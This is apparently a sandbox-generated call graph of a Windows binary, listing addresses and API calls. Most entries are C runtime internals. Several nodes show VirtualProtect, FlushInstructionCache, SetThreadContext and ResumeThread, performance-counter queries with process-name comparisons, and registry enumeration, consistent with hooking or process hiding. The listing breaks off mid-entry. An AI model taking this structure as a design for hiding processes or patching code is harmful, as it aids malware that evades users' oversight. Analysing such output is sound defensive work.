253fc40db7b FindFirstFileExW 17438->17439 17440 253fc40dba8 17439->17440 17450 253fc40dbd2 17439->17450 17441 253fc40d894 56 API calls 17440->17441 17442 253fc40dbb8 17441->17442 17442->17444 17445 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17442->17445 17443 253fc40dd78 14 API calls 17443->17450 17444->17432 17445->17444 17446 253fc40f198 9 API calls 17446->17450 17447 253fc40d4ac 16 API calls 17447->17450 17448 253fc40d894 56 API calls 17448->17450 17449 253fc40dcc8 FindNextFileW 17449->17450 17451 253fc40dce0 17449->17451 17450->17443 17450->17446 17450->17447 17450->17448 17450->17449 17452 253fc40dd2a 17450->17452 17459 253fc40d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 17450->17459 17453 253fc40dd0c FindClose 17451->17453 17455 253fc410b20 38 API calls 17451->17455 17454 253fc40dd38 FindClose 17452->17454 17457 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17452->17457 17453->17444 17456 253fc40dd1c 17453->17456 17454->17444 17458 253fc40dd48 17454->17458 17455->17453 17460 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17456->17460 17457->17454 17461 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17458->17461 17459->17450 17460->17444 17461->17444 17467 253fc410ed5 17462->17467 17463 253fc410eda 17464 253fc410ef0 17463->17464 17465 253fc40d1f4 __std_exception_copy 13 API calls 17463->17465 17464->17350 17466 253fc410ee4 17465->17466 17468 253fc40d04c _invalid_parameter_noinfo 38 API calls 17466->17468 17467->17463 17467->17464 17469 253fc410f24 17467->17469 17468->17464 17469->17464 17470 253fc40d1f4 __std_exception_copy 13 API calls 17469->17470 17470->17466 17472 253fc40ef1f 17471->17472 17473 253fc40ef02 17471->17473 17475 253fc40ef29 17472->17475 17541 253fc4119f0 17472->17541 17473->17472 17474 253fc40ef10 17473->17474 17476 253fc40d1f4 __std_exception_copy 13 API calls 17474->17476 17548 253fc411a40 17475->17548 17479 253fc40ef15 17476->17479 17479->17385 17481 253fc4113e0 17480->17481 17482 253fc4113f5 17481->17482 17485 253fc41140e 17481->17485 17483 253fc40d1f4 __std_exception_copy 13 API calls 17482->17483 17484 253fc4113fa 17483->17484 17486 253fc40d04c _invalid_parameter_noinfo 38 API calls 17484->17486 17487 253fc40dd78 14 API calls 17485->17487 17488 253fc411405 17485->17488 17486->17488 17487->17488 17488->17386 17490 253fc40d336 17489->17490 17491 253fc40d35a 17489->17491 17494 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17490->17494 17498 253fc40d345 FindFirstFileExW 17490->17498 17492 253fc40d3bf 17491->17492 17493 253fc40d35f 17491->17493 17495 253fc40ec58 MultiByteToWideChar 17492->17495 17496 253fc40d374 17493->17496 17493->17498 17499 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17493->17499 17494->17498 17506 253fc40d3db 17495->17506 17500 253fc40c5d0 14 API calls 17496->17500 17497 253fc40d3e2 GetLastError 17501 253fc40d184 13 API calls 17497->17501 17498->17403 17498->17413 17499->17496 17500->17498 17504 253fc40d3ef 17501->17504 17502 253fc40d420 17502->17498 17503 253fc40ec58 MultiByteToWideChar 17502->17503 17508 253fc40d47a 17503->17508 17509 253fc40d1f4 __std_exception_copy 13 API calls 17504->17509 17505 253fc40d413 17507 253fc40c5d0 14 API calls 17505->17507 17506->17497 17506->17502 17506->17505 17510 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17506->17510 17507->17502 17508->17497 17508->17498 17509->17498 17510->17505 17512 253fc40d4d6 17511->17512 17513 253fc40d4fa 17511->17513 17516 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17512->17516 17518 253fc40d4e5 17512->17518 17514 253fc40d500 17513->17514 17515 253fc40d55f 17513->17515 17514->17518 17519 253fc40d515 17514->17519 17520 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17514->17520 17517 253fc40ece8 WideCharToMultiByte 17515->17517 17516->17518 17524 253fc40d583 17517->17524 17518->17413 17521 253fc40c5d0 14 API calls 17519->17521 17520->17519 17521->17518 17522 253fc40d58a GetLastError 17523 253fc40d184 13 API calls 17522->17523 17526 253fc40d597 17523->17526 17524->17522 17527 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17524->17527 17531 253fc40d5bb 17524->17531 17532 253fc40d5c7 17524->17532 17525 253fc40ece8 WideCharToMultiByte 17529 253fc40d629 17525->17529 17530 253fc40d1f4 __std_exception_copy 13 API calls 17526->17530 17527->17531 17528 253fc40c5d0 14 API calls 17528->17532 17529->17518 17529->17522 17530->17518 17531->17528 17532->17518 17532->17525 17534 253fc410b52 17533->17534 17535 253fc40d1f4 __std_exception_copy 13 API calls 17534->17535 17540 253fc410b67 17534->17540 17536 253fc410b5c 17535->17536 17537 253fc40d04c _invalid_parameter_noinfo 38 API calls 17536->17537 17537->17540 17538 253fc408070 _invalid_parameter_noinfo 8 API calls 17539 253fc410ea8 17538->17539 17539->17416 17540->17538 17542 253fc4119f9 17541->17542 17543 253fc411a12 HeapSize 17541->17543 17544 253fc40d1f4 __std_exception_copy 13 API calls 17542->17544 17545 253fc4119fe 17544->17545 17546 253fc40d04c _invalid_parameter_noinfo 38 API calls 17545->17546 17547 253fc411a09 17546->17547 17547->17475 17549 253fc411a55 17548->17549 17550 253fc411a5f 17548->17550 17552 253fc40c5d0 14 API calls 17549->17552 17551 253fc411a64 17550->17551 17559 253fc411a6b _invalid_parameter_noinfo 17550->17559 17553 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17551->17553 17556 253fc411a5d 17552->17556 17553->17556 17554 253fc411a9e HeapReAlloc 17554->17556 17554->17559 17555 253fc411a71 17557 253fc40d1f4 __std_exception_copy 13 API calls 17555->17557 17556->17479 17557->17556 17558 253fc40b470 _invalid_parameter_noinfo 2 API calls 17558->17559 17559->17554 17559->17555 17559->17558 15328 253fc41485e 15329 253fc409324 _CreateFrameInfo 9 API calls 15328->15329 15330 253fc41486c 15329->15330 15331 253fc409324 _CreateFrameInfo 9 API calls 15330->15331 15332 253fc414877 15330->15332 15331->15332 16575 253fc413960 16585 253fc408ca0 16575->16585 16577 253fc413988 16579 253fc409324 _CreateFrameInfo 9 API calls 16580 253fc413998 16579->16580 16581 253fc409324 _CreateFrameInfo 9 API calls 16580->16581 16582 253fc4139a1 16581->16582 16583 253fc40c2f4 14 API calls 16582->16583 16584 253fc4139aa 16583->16584 16588 253fc408cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 16585->16588 16586 253fc408dd1 16586->16577 16586->16579 16587 253fc408d94 RtlUnwindEx 16587->16588 16588->16586 16588->16587 17568 253fc41465f 17569 253fc414677 17568->17569 17575 253fc4146e2 17568->17575 17570 253fc409324 _CreateFrameInfo 9 API calls 17569->17570 17569->17575 17571 253fc4146c4 17570->17571 17572 253fc409324 _CreateFrameInfo 9 API calls 17571->17572 17573 253fc4146d9 17572->17573 17574 253fc40c2f4 14 API calls 17573->17574 17574->17575 18194 253fc407f60 18195 253fc407f7c 18194->18195 18196 253fc407f81 18194->18196 18198 253fc408090 18195->18198 18199 253fc4080b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18198->18199 18200 253fc408127 18198->18200 18199->18200 18200->18196 18208 253fc402f64 18210 253fc402fc1 18208->18210 18209 253fc402fdc 18210->18209 18211 253fc4038a8 3 API calls 18210->18211 18211->18209 15459 253fc40f870 15460 253fc40f8a0 15459->15460 15462 253fc40f8c7 15459->15462 15461 253fc40cb10 __std_exception_copy 13 API calls 15460->15461 15460->15462 15466 253fc40f8b4 15460->15466 15461->15466 15463 253fc40f99c 15462->15463 15485 253fc40c558 EnterCriticalSection 15462->15485 15467 253fc40fab3 15463->15467 15469 253fc40fa03 15463->15469 15475 253fc40f9ca 15463->15475 15464 253fc40f904 15466->15462 15466->15464 15468 253fc40f949 15466->15468 15470 253fc40fac0 15467->15470 15487 253fc40c5ac LeaveCriticalSection 15467->15487 15471 253fc40d1f4 __std_exception_copy 13 API calls 15468->15471 15478 253fc40fa61 15469->15478 15486 253fc40c5ac LeaveCriticalSection 15469->15486 15474 253fc40f94e 15471->15474 15482 253fc40d04c 15474->15482 15475->15469 15477 253fc40cab0 _invalid_parameter_noinfo 14 API calls 15475->15477 15479 253fc40f9f3 15477->15479 15481 253fc40cab0 14 API calls _invalid_parameter_noinfo 15478->15481 15480 253fc40cab0 _invalid_parameter_noinfo 14 API calls 15479->15480 15480->15469 15481->15478 15488 253fc40cef8 15482->15488 15489 253fc40cf23 15488->15489 15496 253fc40cf94 15489->15496 15491 253fc40cf4a 15494 253fc40cf6d 15491->15494 15506 253fc40c3e0 15491->15506 15493 253fc40c3e0 _invalid_parameter_noinfo 17 API calls 15495 253fc40cf82 15493->15495 15494->15493 15494->15495 15495->15464 15519 253fc40ccc8 15496->15519 15501 253fc40cfcf 15501->15491 15507 253fc40c438 15506->15507 15508 253fc40c3ef GetLastError 15506->15508 15507->15494 15509 253fc40c404 15508->15509 15510 253fc40cba0 _invalid_parameter_noinfo 14 API calls 15509->15510 15511 253fc40c41e SetLastError 15510->15511 15511->15507 15512 253fc40c441 15511->15512 15513 253fc40c3e0 _invalid_parameter_noinfo 15 API calls 15512->15513 15514 253fc40c467 15513->15514 15559 253fc40ffe8 15514->15559 15520 253fc40cce4 GetLastError 15519->15520 15521 253fc40cd1f 15519->15521 15522 253fc40ccf4 15520->15522 15521->15501 15525 253fc40cd34 15521->15525 15532 253fc40cba0 15522->15532 15526 253fc40cd68 15525->15526 15527 253fc40cd50 GetLastError SetLastError 15525->15527 15526->15501 15528 253fc40d06c IsProcessorFeaturePresent 15526->15528 15527->15526 15529 253fc40d07f 15528->15529 15537 253fc40cd80 15529->15537 15533 253fc40cbc4 15532->15533 15534 253fc40cbc8 FlsGetValue 15532->15534 15535 253fc40cbde SetLastError 15533->15535 15536 253fc40c940 _invalid_parameter_noinfo 13 API calls 15533->15536 15534->15533 15535->15521 15536->15535 15538 253fc40cdba _invalid_parameter_noinfo 15537->15538 15539 253fc40cde2 RtlCaptureContext RtlLookupFunctionEntry 15538->15539 15540 253fc40ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15539->15540 15541 253fc40ce2e RtlVirtualUnwind 15539->15541 15542 253fc40ceb6 _invalid_parameter_noinfo 15540->15542 15541->15540 15545 253fc408070 15542->15545 15546 253fc408079 15545->15546 15547 253fc408084 GetCurrentProcess TerminateProcess 15546->15547 15548 253fc408848 IsProcessorFeaturePresent 15546->15548 15549 253fc408860 15548->15549 15554 253fc40891c RtlCaptureContext 15549->15554 15555 253fc408936 RtlLookupFunctionEntry 15554->15555 15556 253fc408873 15555->15556 15557 253fc40894c RtlVirtualUnwind 15555->15557 15558 253fc408814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15556->15558 15557->15555 15557->15556 15560 253fc40c48f 15559->15560 15561 253fc410001 15559->15561 15563 253fc410054 15560->15563 15561->15560 15567 253fc410a40 15561->15567 15564 253fc40c49f 15563->15564 15565 253fc41006d 15563->15565 15564->15494 15565->15564 15577 253fc40e8c4 15565->15577 15568 253fc40cab0 _invalid_parameter_noinfo 14 API calls 15567->15568 15569 253fc410a4f 15568->15569 15575 253fc410a95 15569->15575 15576 253fc40c558 EnterCriticalSection 15569->15576 15575->15560 15578 253fc40cab0 _invalid_parameter_noinfo 14 API calls 15577->15578 15579 253fc40e8cd 15578->15579 18217 253fc40f370 VirtualProtect 17579 253fc408672 17580 253fc4090c0 __std_exception_copy 38 API calls 17579->17580 17581 253fc40869d 17580->17581 18218 253fc4146f5 18219 253fc409324 _CreateFrameInfo 9 API calls 18218->18219 18220 253fc41470d 18219->18220 18221 253fc409324 _CreateFrameInfo 9 API calls 18220->18221 18222 253fc414728 18221->18222 18223 253fc409324 _CreateFrameInfo 9 API calls 18222->18223 18224 253fc41473c 18223->18224 18225 253fc409324 _CreateFrameInfo 9 API calls 18224->18225 18226 253fc41477e 18225->18226 15584 253fc405ff9 15585 253fc406000 VirtualProtect 15584->15585 15586 253fc406029 GetLastError 15585->15586 15587 253fc405f10 15585->15587 15586->15587 17588 253fc4041f9 17589 253fc404146 17588->17589 17590 253fc404196 VirtualQuery 17589->17590 17591 253fc4041b0 17589->17591 17592 253fc4041ca VirtualAlloc 17589->17592 17590->17589 17590->17591 17592->17591 17593 253fc4041fb GetLastError 17592->17593 17593->17589 17593->17591 15588 253fc40cbfc 15593 253fc40f3a0 15588->15593 15590 253fc40cc05 15591 253fc40cb10 __std_exception_copy 13 API calls 15590->15591 15592 253fc40cc22 __vcrt_uninitialize_ptd 15590->15592 15591->15592 15594 253fc40f3b5 15593->15594 15595 253fc40f3b1 15593->15595 15594->15595 15597 253fc40ef88 15594->15597 15595->15590 15598 253fc40f078 15597->15598 15606 253fc40efbd __vcrt_FlsAlloc 15597->15606 15615 253fc40c558 EnterCriticalSection 15598->15615 15600 253fc40efe2 LoadLibraryExW 15603 253fc40f107 15600->15603 15604 253fc40f007 GetLastError 15600->15604 15602 253fc40f120 GetProcAddress 15602->15598 15603->15602 15607 253fc40f117 FreeLibrary 15603->15607 15604->15606 15606->15598 15606->15600 15606->15602 15613 253fc40f041 LoadLibraryExW 15606->15613 15607->15602 15613->15603 15613->15606 16589 253fc40b500 16594 253fc40c558 EnterCriticalSection 16589->16594 18236 253fc402300 18237 253fc402331 18236->18237 18238 253fc402447 18237->18238 18245 253fc402355 18237->18245 18246 253fc402412 18237->18246 18239 253fc4024bb 18238->18239 18240 253fc40244c 18238->18240 18243 253fc4035c8 11 API calls 18239->18243 18239->18246 18253 253fc4035c8 GetProcessHeap HeapAlloc 18240->18253 18242 253fc40238d StrCmpNIW 18242->18245 18243->18246 18245->18242 18245->18246 18247 253fc401d30 18245->18247 18248 253fc401db4 18247->18248 18249 253fc401d57 GetProcessHeap HeapAlloc 18247->18249 18248->18245 18249->18248 18250 253fc401d92 18249->18250 18251 253fc401cfc 2 API calls 18250->18251 18252 253fc401d9a GetProcessHeap HeapFree 18251->18252 18252->18248 18254 253fc40361b 18253->18254 18255 253fc4036d9 GetProcessHeap HeapFree 18254->18255 18256 253fc4036d4 18254->18256 18257 253fc403666 StrCmpNIW 18254->18257 18258 253fc401d30 6 API calls 18254->18258 18255->18246 18256->18255 18257->18254 18258->18254 17594 253fc40820c 17601 253fc408f34 17594->17601 17600 253fc408219 17602 253fc409340 _CreateFrameInfo 9 API calls 17601->17602 17603 253fc408215 17602->17603 17603->17600 17604 253fc40c288 17603->17604 17605 253fc40cb10 __std_exception_copy 13 API calls 17604->17605 17606 253fc408222 17605->17606 17606->17600 17607 253fc408f48 17606->17607 17610 253fc4092dc 17607->17610 17609 253fc408f51 17609->17600 17611 253fc4092ed 17610->17611 17615 253fc409302 17610->17615 17612 253fc409c8c _CreateFrameInfo 6 API calls 17611->17612 17613 253fc4092f2 17612->17613 17616 253fc409cd4 17613->17616 17615->17609 17617 253fc409aac __vcrt_FlsAlloc 5 API calls 17616->17617 17618 253fc409d02 17617->17618 17619 253fc409d14 TlsSetValue 17618->17619 17620 253fc409d0c 17618->17620 17619->17620 17620->17615 18282 253fc408f0c 18289 253fc40946c 18282->18289 18285 253fc408f19 18290 253fc409474 18289->18290 18292 253fc4094a5 18290->18292 18293 253fc408f15 18290->18293 18306 253fc409d28 18290->18306 18294 253fc4094b4 __vcrt_uninitialize_locks DeleteCriticalSection 18292->18294 18293->18285 18295 253fc409400 18293->18295 18294->18293 18311 253fc409bfc 18295->18311 18307 253fc409aac __vcrt_FlsAlloc 5 API calls 18306->18307 18308 253fc409d5e 18307->18308 18309 253fc409d73 InitializeCriticalSectionAndSpinCount 18308->18309 18310 253fc409d68 18308->18310 18309->18310 18310->18290 18312 253fc409aac __vcrt_FlsAlloc 5 API calls 18311->18312 18313 253fc409c21 TlsAlloc 18312->18313 16609 253fc40c510 16610 253fc40c518 16609->16610 16611 253fc40c545 16610->16611 16613 253fc40c574 16610->16613 16614 253fc40c59f 16613->16614 16615 253fc40c5a3 16614->16615 16616 253fc40c582 DeleteCriticalSection 16614->16616 16615->16611 16616->16614 17649 253fc414611 __scrt_dllmain_exception_filter 17659 253fc40c218 17660 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17659->17660 17661 253fc40c228 17660->17661 17662 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17661->17662 17663 253fc40c23c 17662->17663 17664 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17663->17664 17665 253fc40c250 17664->17665 17666 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17665->17666 17667 253fc40c264 17666->17667 16617 253fc402518 GetProcessIdOfThread GetCurrentProcessId 16618 253fc402543 CreateFileW 16617->16618 16619 253fc4025be 16617->16619 16618->16619 16620 253fc402577 WriteFile ReadFile CloseHandle 16618->16620 16620->16619 15653 253fc40f820 15656 253fc40f7d8 15653->15656 15661 253fc40c558 EnterCriticalSection 15656->15661 17680 253fc40fe20 17681 253fc40fe4a 17680->17681 17682 253fc40d220 _invalid_parameter_noinfo 13 API calls 17681->17682 17683 253fc40fe6a 17682->17683 17684 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17683->17684 17685 253fc40fe78 17684->17685 17686 253fc40d220 _invalid_parameter_noinfo 13 API calls 17685->17686 17689 253fc40fea2 17685->17689 17688 253fc40fe94 17686->17688 17687 253fc40fec1 InitializeCriticalSectionEx 17687->17689 17690 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17688->17690 17689->17687 17691 253fc40feab 17689->17691 17690->17689 18348 253fc404320 18351 253fc40426d 18348->18351 18349 253fc4042bd VirtualQuery 18350 253fc4042d7 18349->18350 18349->18351 18351->18349 18351->18350 18352 253fc404322 GetLastError 18351->18352 18352->18350 18352->18351 15710 253fc40c828 15711 253fc40c82d 15710->15711 15715 253fc40c842 15710->15715 15716 253fc40c848 15711->15716 15717 253fc40c88a 15716->15717 15721 253fc40c892 15716->15721 15719 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15717->15719 15718 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15720 253fc40c89f 15718->15720 15719->15721 15722 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15720->15722 15721->15718 15723 253fc40c8ac 15722->15723 15724 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15723->15724 15725 253fc40c8b9 15724->15725 15726 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15725->15726 15727 253fc40c8c6 15726->15727 15728 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15727->15728 15729 253fc40c8d3 15728->15729 15730 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15729->15730 15731 253fc40c8e0 15730->15731 15732 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15731->15732 15733 253fc40c8ed 15732->15733 15734 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15733->15734 15735 253fc40c8fd 15734->15735 15736 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15735->15736 15737 253fc40c90d 15736->15737 15742 253fc40c6f8 15737->15742 15756 253fc40c558 EnterCriticalSection 15742->15756 15759 253fc40ec30 GetCommandLineA GetCommandLineW 15760 253fc406430 15761 253fc40643d 15760->15761 15762 253fc406449 15761->15762 15769 253fc40655a 15761->15769 15763 253fc4064cd 15762->15763 15764 253fc4064a6 SetThreadContext 15762->15764 15764->15763 15765 253fc40663e 15767 253fc40665e 15765->15767 15776 253fc404b20 15765->15776 15766 253fc406581 VirtualProtect FlushInstructionCache 15766->15769 15780 253fc405530 GetCurrentProcess 15767->15780 15769->15765 15769->15766 15771 253fc4066b7 15774 253fc408070 _invalid_parameter_noinfo 8 API calls 15771->15774 15772 253fc406677 ResumeThread 15773 253fc406663 15772->15773 15773->15771 15773->15772 15775 253fc4066ff 15774->15775 15778 253fc404b3c 15776->15778 15777 253fc404b9f 15777->15767 15778->15777 15779 253fc404b52 VirtualFree 15778->15779 15779->15778 15781 253fc40554c 15780->15781 15782 253fc405593 15781->15782 15783 253fc405562 VirtualProtect FlushInstructionCache 15781->15783 15782->15773 15783->15781 17692 253fc402ab4 TlsGetValue TlsGetValue TlsGetValue 17693 253fc402b0d 17692->17693 17698 253fc402b79 17692->17698 17695 253fc402b15 17693->17695 17693->17698 17694 253fc402b74 17695->17694 17696 253fc402c32 TlsSetValue TlsSetValue TlsSetValue 17695->17696 17697 253fc403f88 StrCmpNIW 17695->17697 17696->17694 17697->17695 17698->17694 17698->17696 17699 253fc403f88 StrCmpNIW 17698->17699 17699->17698 15808 253fc4034b8 15809 253fc4034e8 15808->15809 15810 253fc4035a1 15809->15810 15811 253fc403505 PdhGetCounterInfoW 15809->15811 15811->15810 15812 253fc403523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 15811->15812 15813 253fc403555 StrCmpW 15812->15813 15814 253fc40358d GetProcessHeap HeapFree 15812->15814 15813->15814 15815 253fc40356a 15813->15815 15814->15810 15815->15814 15817 253fc403950 StrCmpNW 15815->15817 15818 253fc4039f2 15817->15818 15819 253fc403982 StrStrW 15817->15819 15818->15815 15819->15818 15820 253fc40399b StrToIntW 15819->15820 15820->15818 15821 253fc4039c3 15820->15821 15821->15818 15827 253fc401a30 OpenProcess 15821->15827 15828 253fc401a64 K32GetModuleFileNameExW 15827->15828 15829 253fc401ab6 15827->15829 15830 253fc401aad CloseHandle 15828->15830 15831 253fc401a7e PathFindFileNameW lstrlenW 15828->15831 15829->15818 15833 253fc403f88 15829->15833 15830->15829 15831->15830 15832 253fc401a9c StrCpyW 15831->15832 15832->15830 15834 253fc403f95 StrCmpNIW 15833->15834 15835 253fc4039e4 15833->15835 15834->15835 15835->15818 15836 253fc401cfc 15835->15836 15837 253fc401d13 15836->15837 15838 253fc401d1c 15836->15838 15839 253fc401530 2 API calls 15837->15839 15838->15818 15839->15838 15840 253fc4334b8 15841 253fc4334e8 15840->15841 15842 253fc4335a1 15841->15842 15843 253fc433505 PdhGetCounterInfoW 15841->15843 15843->15842 15844 253fc433523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 15843->15844 15845 253fc433555 StrCmpW 15844->15845 15846 253fc43358d GetProcessHeap HeapFree 15844->15846 15845->15846 15848 253fc43356a 15845->15848 15846->15842 15848->15846 15849 253fc433950 StrCmpNW 15848->15849 15850 253fc433982 StrStrW 15849->15850 15853 253fc4339f2 15849->15853 15851 253fc43399b StrToIntW 15850->15851 15850->15853 15852 253fc4339c3 15851->15852 15851->15853 15852->15853 15859 253fc431a30 OpenProcess 15852->15859 15853->15848 15860 253fc431ab6 15859->15860 15861 253fc431a64 K32GetModuleFileNameExW 15859->15861 15860->15853 15865 253fc433f88 15860->15865 15862 253fc431a7e PathFindFileNameW lstrlenW 15861->15862 15863 253fc431aad CloseHandle 15861->15863 15862->15863 15864 253fc431a9c StrCpyW 15862->15864 15863->15860 15864->15863 15866 253fc433f95 StrCmpNIW 15865->15866 15867 253fc4339e4 15865->15867 15866->15867 15867->15853 15868 253fc431cfc 15867->15868 15869 253fc431d1c 15868->15869 15870 253fc431d13 15868->15870 15869->15853 15872 253fc431530 15870->15872 15873 253fc431580 15872->15873 15876 253fc43154a 15872->15876 15873->15869 15874 253fc431569 StrCmpW 15874->15876 15875 253fc431561 StrCmpIW 15875->15876 15876->15873 15876->15874 15876->15875 16625 253fc4081c0 16626 253fc4081c9 __scrt_acquire_startup_lock 16625->16626 16627 253fc4081cd 16626->16627 16629 253fc40bbb4 16626->16629 16630 253fc40bbd4 16629->16630 16657 253fc40bbed 16629->16657 16631 253fc40bbdc 16630->16631 16632 253fc40bbf2 16630->16632 16633 253fc40d1f4 __std_exception_copy 13 API calls 16631->16633 16634 253fc40e864 56 API calls 16632->16634 16635 253fc40bbe1 16633->16635 16636 253fc40bbf7 16634->16636 16637 253fc40d04c _invalid_parameter_noinfo 38 API calls 16635->16637 16658 253fc40df38 GetModuleFileNameW 16636->16658 16637->16657 16644 253fc40bc7a 16647 253fc40b994 14 API calls 16644->16647 16645 253fc40bc69 16646 253fc40d1f4 __std_exception_copy 13 API calls 16645->16646 16648 253fc40bc6e 16646->16648 16649 253fc40bc96 16647->16649 16650 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16648->16650 16649->16648 16651 253fc40bcc6 16649->16651 16652 253fc40bcdf 16649->16652 16650->16657 16653 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16651->16653 16655 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16652->16655 16654 253fc40bccf 16653->16654 16656 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16654->16656 16655->16648 16656->16657 16657->16627 16659 253fc40df7d GetLastError 16658->16659 16660 253fc40df91 16658->16660 16682 253fc40d184 16659->16682 16662 253fc40dd78 14 API calls 16660->16662 16663 253fc40dfbf 16662->16663 16664 253fc40dfd0 16663->16664 16687 253fc40f198 16663->16687 16691 253fc40de1c 16664->16691 16666 253fc408070 _invalid_parameter_noinfo 8 API calls 16667 253fc40bc0e 16666->16667 16670 253fc40b994 16667->16670 16669 253fc40df8a 16669->16666 16671 253fc40b9d2 16670->16671 16674 253fc40ba38 16671->16674 16708 253fc40ec1c 16671->16708 16673 253fc40bb25 16676 253fc40bb54 16673->16676 16674->16673 16675 253fc40ec1c 14 API calls 16674->16675 16675->16674 16677 253fc40bb6c 16676->16677 16681 253fc40bba4 16676->16681 16678 253fc40d220 _invalid_parameter_noinfo 13 API calls 16677->16678 16677->16681 16679 253fc40bb9a 16678->16679 16680 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16679->16680 16680->16681 16681->16644 16681->16645 16705 253fc40d1d0 16682->16705 16684 253fc40d191 Concurrency::details::SchedulerProxy::DeleteThis 16685 253fc40d1f4 __std_exception_copy 13 API calls 16684->16685 16686 253fc40d1a1 16685->16686 16686->16669 16688 253fc40f1ca 16687->16688 16689 253fc40f1a9 16687->16689 16688->16664 16689->16688 16690 253fc40ef88 9 API calls 16689->16690 16690->16688 16692 253fc40de5b 16691->16692 16700 253fc40de40 16691->16700 16693 253fc40ece8 WideCharToMultiByte 16692->16693 16699 253fc40de60 16692->16699 16694 253fc40deb7 16693->16694 16695 253fc40debe GetLastError 16694->16695 16698 253fc40dee9 16694->16698 16694->16699 16697 253fc40d184 13 API calls 16695->16697 16696 253fc40d1f4 __std_exception_copy 13 API calls 16696->16700 16701 253fc40decb 16697->16701 16702 253fc40ece8 WideCharToMultiByte 16698->16702 16699->16696 16699->16700 16700->16669 16703 253fc40d1f4 __std_exception_copy 13 API calls 16701->16703 16704 253fc40df10 16702->16704 16703->16700 16704->16695 16704->16700 16706 253fc40cb10 __std_exception_copy 13 API calls 16705->16706 16707 253fc40d1d9 16706->16707 16707->16684 16709 253fc40eba8 16708->16709 16710 253fc40dd78 14 API calls 16709->16710 16711 253fc40ebcc 16710->16711 16711->16671 18373 253fc4147c2 18374 253fc409978 __CxxCallCatchBlock 9 API calls 18373->18374 18377 253fc4147d5 18374->18377 18375 253fc414814 __CxxCallCatchBlock 18376 253fc409324 _CreateFrameInfo 9 API calls 18375->18376 18378 253fc414828 18376->18378 18377->18375 18381 253fc408ff8 __CxxCallCatchBlock 9 API calls 18377->18381 18379 253fc409324 _CreateFrameInfo 9 API calls 18378->18379 18380 253fc414838 18379->18380 18381->18375 14936 253fc401bc4 14943 253fc401724 GetProcessHeap HeapAlloc 14936->14943 14938 253fc401bd3 14939 253fc401bda SleepEx 14938->14939 14942 253fc40159c StrCmpIW StrCmpW 14938->14942 14994 253fc4019b0 14938->14994 14940 253fc401724 50 API calls 14939->14940 14940->14938 14942->14938 15011 253fc401264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14943->15011 14945 253fc40174c 15012 253fc401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14945->15012 14947 253fc401754 15013 253fc401264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14947->15013 14949 253fc40175d 15014 253fc401264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14949->15014 14951 253fc401766 15015 253fc401264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14951->15015 14953 253fc40176f 15016 253fc401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14953->15016 14955 253fc401778 15017 253fc401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14955->15017 14957 253fc401781 15018 253fc401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14957->15018 14959 253fc40178a RegOpenKeyExW 14960 253fc4017bc RegOpenKeyExW 14959->14960 14961 253fc4019a2 14959->14961 14962 253fc4017e5 14960->14962 14963 253fc4017fb RegOpenKeyExW 14960->14963 14961->14938 15019 253fc4012b8 RegQueryInfoKeyW 14962->15019 14965 253fc401836 RegOpenKeyExW 14963->14965 14966 253fc40181f 14963->14966 14969 253fc40185a 14965->14969 14970 253fc401871 RegOpenKeyExW 14965->14970 15028 253fc40104c RegQueryInfoKeyW 14966->15028 14972 253fc4012b8 16 API calls 14969->14972 14973 253fc401895 14970->14973 14974 